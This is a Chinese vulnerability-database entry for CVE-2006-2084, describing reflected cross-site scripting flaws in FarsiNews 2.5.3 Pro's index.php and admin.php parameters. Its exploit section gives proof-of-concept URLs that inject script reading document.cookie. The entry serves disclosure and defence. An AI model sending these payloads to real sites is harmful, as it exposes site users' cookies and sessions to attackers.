FarsiNews 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195173 漏洞类型 跨站脚本
发布时间 2006-04-29 更新时间 2006-04-30
CVE编号 CVE-2006-2084 CNNVD-ID CNNVD-200604-549
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-549
|漏洞详情
FarsiNews2.5.3Pro及早期版本中存在多个跨站脚本攻击漏洞。这使得远程攻击者可以借助于(a)index.php中的参数(1)month和(2)year以及(b)admin.php中的参数(3)mod注入任意Web脚本或HTML。
|漏洞EXP
XSS attack:
http://[target]/[farsinews_path ]/index.php?month=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!
--&year=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--

http://[target]/[farsinews_path]/admin.php?mod=%3E%3Cscript%3Ealert(docu
ment.cookie)%3C/script%3E%3C !--

Original Advisory
http://www.aria-security.net/advisory/farsinews/farsinews0420062.txt
|参考资料

来源:BUGTRAQ
名称:20060426XXSAttackOnFarsiNews
链接:http://www.securityfocus.com/archive/1/archive/1/432109/100/0/threaded
来源:MISC
链接:http://www.aria-security.net/advisory/farsinews/farsinews0420062.txt
来源:XF
名称:farsinews-index-admin-xss(26097)
链接:http://xforce.iss.net/xforce/xfdb/26097
来源:BID
名称:17701
链接:http://www.securityfocus.com/bid/17701
来源:SREASON
名称:812
链接:http://securityreason.com/securityalert/812